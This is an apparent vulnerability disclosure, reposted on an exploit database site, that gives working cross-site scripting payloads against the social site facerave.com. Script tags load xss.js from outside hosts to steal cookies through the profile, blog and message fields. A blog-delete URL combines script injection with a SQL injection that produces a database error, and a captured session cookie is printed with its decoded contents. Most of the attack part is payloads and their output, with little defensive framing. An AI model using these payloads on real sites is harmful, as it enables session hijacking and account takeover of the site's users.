`Facerave.com
Homepage:
http://www.facerave.com
Effected files:
* Profile input boxes
- Self Description box
* Posting a blog entry
* Sending a message
index.php
------------------------------------------------------
XSS vuln with cookie disclosure via posting a comment:
No filter evasion needed. for PoC in yourself description box put:
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Screenshots:
http://www.youfucktard.com/xsp/facerave1.jpg
http://www.youfucktard.com/xsp/facerave2.jpg
-----------------------------------------------------
XSS vuln with cookie disclosure when posting a blog entry:
Same as above:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
Screenshots:
http://www.youfucktard.com/xsp/facerave3.jpg
http://www.youfucktard.com/xsp/facerave4.jpg
Our cookie:
This is remote text via xss.js located at youfucktard.com lang=en; PHPSESSID=dfb7edf9c3d2350d04cd5ed60585b2f1;voted=YToxMTp7aTowO047aToxO3M6NDoiMzkzNiI7aToyO3M6NDoiNzQ1NCI7aTozO3M6NjoiMTE4OTY1IjtpOjQ7czo2OiIxMTg5NjYiO2k6NTtzOjY6IjExODk2NyI7aTo2O3M6NjoiMTE4OTY4IjtpOjc7czo2OiIxMTg5NjkiO2k6ODtzOjY6IjExODk3MCI7aTo5O3M6NjoiMTE4OTcxIjtpOjEwO3M6NjoiMTE4OTcyIjt9; last_pr=7454
Breaking down the cookie:
PHPSESSID= (Our php session Id on the site)
voted= Base64 encoded. When we decode it we get:
a:11:{i:0;N;i:1;s:4:"3936";i:2;s:4:"7454";i:3;s:6:"118965";i:4;s:6
----------------------------------------------------
XSS Vuln and possible SQL injection on deleting blog id:
http://www.facerave.com/index.php?req=blog&act=del&id=1087">"><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>
Query error msg:
You have an error in your SQL syntax near '\' AND b_user=7454' at line 1
Failed query: DELETE FROM rate_blogs WHERE b_id=1087\' AND b_user=7454
Screenshot:
http://www.youfucktard.com/xsp/facerave5.jpg
-----------------------------------------------------
Sending a message xss vuln:
Same as above, no filter evasion. in your msg title or subject put:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
Screenshot:
http://www.youfucktard.com/xsp/facerave6.jpg
------------------------------------------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation